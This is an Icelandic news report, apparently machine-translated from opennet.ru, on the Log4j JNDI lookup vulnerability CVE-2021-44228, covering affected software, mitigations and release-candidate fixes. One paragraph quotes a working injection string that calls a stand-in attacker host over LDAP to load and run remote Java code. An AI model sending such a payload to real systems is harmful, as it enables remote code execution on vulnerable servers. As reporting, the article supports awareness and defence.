Í Apache Log4j, vinsælum ramma til að skipuleggja skógarhögg í Java forritum, hefur verið greint frá mikilvægum varnarleysi sem gerir kleift að keyra handahófskenndan kóða þegar sérsniðið gildi á „{jndi:URL}“ sniði er skrifað í annálinn. Árásin er hægt að framkvæma á Java forritum sem skrá gildi sem berast frá utanaðkomandi aðilum, til dæmis þegar vandamál eru sýnd í villuboðum.
Það er tekið fram að næstum öll verkefni sem nota ramma eins og Apache Struts, Apache Solr, Apache Druid eða Apache Flink verða fyrir áhrifum af vandamálinu, þar á meðal Steam, Apple iCloud, Minecraft viðskiptavinir og netþjónar. Búist er við að varnarleysið gæti leitt til bylgju gríðarlegra árása á fyrirtækjaforrit, endurtaka sögu mikilvægra veikleika í Apache Struts rammanum, sem, samkvæmt grófu mati, er notað í vefforritum af 65% Fortune 100 fyrirtæki. Þar á meðal tilraunir til að skanna netið fyrir viðkvæm kerfi.
Vandamálið eykst af því að vinnandi hagnýting hefur þegar verið birt, en lagfæringar fyrir stöðugu útibúin hafa ekki enn verið teknar saman. CVE auðkenni hefur ekki enn verið úthlutað. Lagfæringin er aðeins innifalin í log4j-2.15.0-rc1 prófunargreininni. Sem lausn til að loka á varnarleysið er mælt með því að stilla log4j2.formatMsgNoLookups færibreytuna á satt.
Vandamálið stafaði af þeirri staðreynd að log4j styður vinnslu á sérstökum grímum „{}“ í línuútgangi í skránni, þar sem hægt var að framkvæma JNDI (Java Naming and Directory Interface) fyrirspurnir. Árásin snýst um að senda streng með skiptingunni „${jndi:ldap://attacker.com/a}“, við vinnslu sem log4j mun senda LDAP beiðni um slóðina að Java bekknum til attacker.com þjónsins. . Slóðin sem þjónn árásarmannsins skilar (til dæmis http://second-stage.attacker.com/Exploit.class) verður hlaðin og keyrð í samhengi við núverandi ferli, sem gerir árásarmanninum kleift að keyra handahófskenndan kóða á kerfi með réttindum núverandi umsóknar.
Viðbót 1: Varnarleysinu hefur verið úthlutað auðkenninu CVE-2021-44228.
Viðbót 2: Búið er að finna leið til að komast framhjá verndinni sem bætt var við útgáfu log4j-2.15.0-rc1. Ný uppfærsla, log4j-2.15.0-rc2, hefur verið lögð til með fullkomnari vörn gegn varnarleysinu. Kóðinn undirstrikar breytinguna sem tengist fjarveru óeðlilegrar uppsagnar ef notað er rangt sniðið JNDI vefslóð.
Heimild: opennet.ru